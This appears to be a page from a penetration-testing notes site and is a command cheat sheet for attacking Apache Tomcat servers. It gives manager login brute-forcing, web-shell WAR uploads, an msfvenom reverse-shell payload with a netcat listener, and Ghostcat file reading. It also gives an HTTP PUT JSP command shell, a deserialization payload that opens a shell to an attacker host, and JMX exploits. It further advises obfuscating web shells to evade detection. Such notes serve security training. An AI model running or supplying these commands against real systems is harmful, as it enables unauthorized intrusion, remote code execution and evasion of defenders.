8.-Attacking-tomcat

1. Tomcat Manager Brute-Force:

msf6 > use auxiliary/scanner/http/tomcat_mgr_login
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS <target_ip>
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT <target_port>
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set VHOST <target_vhost>
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set STOP_ON_SUCCESS true
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt
msf6 auxiliary(scanner/http/tomcat_mgr_login) > run
python3 mgr_brute.py -U http://<target>:<port>/ -P /manager -u /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -p /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt

  • Brute-force attack on Tomcat Manager login.

2. WAR File Upload (After Login):

wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp

  • Upload the .war file via /manager/html interface.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f war > backup.war
nc -lnvp <attacker_port>

  • Generates a reverse shell .war payload and sets up a listener.

3. CVE-2020-1938 (Ghostcat - AJP LFI Exploit):

nmap -sV -p 8009,8080 <target_ip>
python2.7 tomcat-ajp.lfi.py <target_ip> -p 8009 -f WEB-INF/web.xml

  • Exploits the AJP protocol to read sensitive files.

4. Exploiting CVE-2009-3548 (Tomcat Deployment Bypass):

curl -T shell.war http://<target_ip>:8080/manager/deploy?path=/shell

  • Uploads a .war file without authentication on vulnerable Tomcat instances.

5. Exploiting CVE-2017-12617 (Arbitrary JSP Upload via HTTP PUT):

curl -v -X PUT -d '<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>' http://<target>:8080/shell.jsp

  • Allows arbitrary JSP file upload, enabling remote command execution.

6. Tomcat Weak Configuration & Exploitation:

curl -u admin:admin http://<target>:8080/manager/html

  • Many Tomcat servers use default credentials.

7. Exploiting CVE-2020-9484 (Tomcat Deserialization RCE):

ysoserial -g CommonsCollections6 -o raw -c "nc -e /bin/bash <attacker_ip> <port>" > payload.ser
curl -X POST -H "Content-Type: application/x-java-serialized-object" --data-binary @payload.ser http://<target>:8080

  • Exploits Java deserialization in persistent sessions for RCE.

8. Attacking Tomcat with Metasploit (JSP Upload via RCE):

use exploit/multi/http/tomcat_mgr_upload
set RHOSTS <target_ip>
set USERNAME admin
set PASSWORD admin
run

  • Deploys a JSP shell on a vulnerable Tomcat instance.

9. Exploiting Tomcat with JMX RMI (CVE-2016-8735):

msfconsole
use exploit/multi/misc/java_jmx_server
set RHOST <target_ip>
set RPORT 1099
run

  • Gains remote access via exposed JMX RMI endpoints.

10. Tomcat JMX Exploitation:

java -jar jmxterm-1.0-alpha-4-uber.jar --url service:jmx:rmi:///jndi/rmi://<target_ip>:<port>/jmxrmi

  • Enumerates and interacts with JMX services for possible RCE.

11. Tomcat Connectors (AJP & HTTP Connector Misconfigurations):

  • AJP connectors can expose internal resources.

  • HTTP connectors can lead to authentication bypass.

12. Important Considerations & Post-Exploitation:

  • /manager Access: Direct access can lead to RCE.

  • Default Credentials: Often present and should be checked first.

  • Ghostcat (CVE-2020-1938): Can expose sensitive configuration files.

  • WAR Files: Can be used for persistence and privilege escalation.

  • JMX Attacks: Can allow attackers to execute arbitrary code.

  • Version-Specific Vulnerabilities: Always check Tomcat’s version for known exploits.

  • Web Shell Security: Encrypt and obfuscate web shells to evade detection.

  • Post-Exploitation: Once inside, enumerate the system and escalate privileges.

Example Additions:

  • AJP Exploitation: "The AJP protocol, if misconfigured, can allow access to internal resources and serious attacks."

  • Tomcat JMX Exploitation: "Tomcat JMX can execute arbitrary code by interacting with MBeans."

  • Tomcat Connectors: "Tomcat connectors, such as the AJP and HTTP connectors, can be misconfigured, leading to security risks."

  • Web Shell Evasion: "Web shells can be obfuscated and encoded to bypass security measures."

  • Post-Exploitation: "After gaining access to a Tomcat server, it is important to enumerate the system and find other vulnerabilities."

  • Tomcat Version-Specific Attacks: "Tomcat versions often have unique vulnerabilities, requiring targeted research."

Previous7.-Tomcat-discovery-and-enumerationNextAttacking Jenkins - Focused Commands & Key Points

Last updated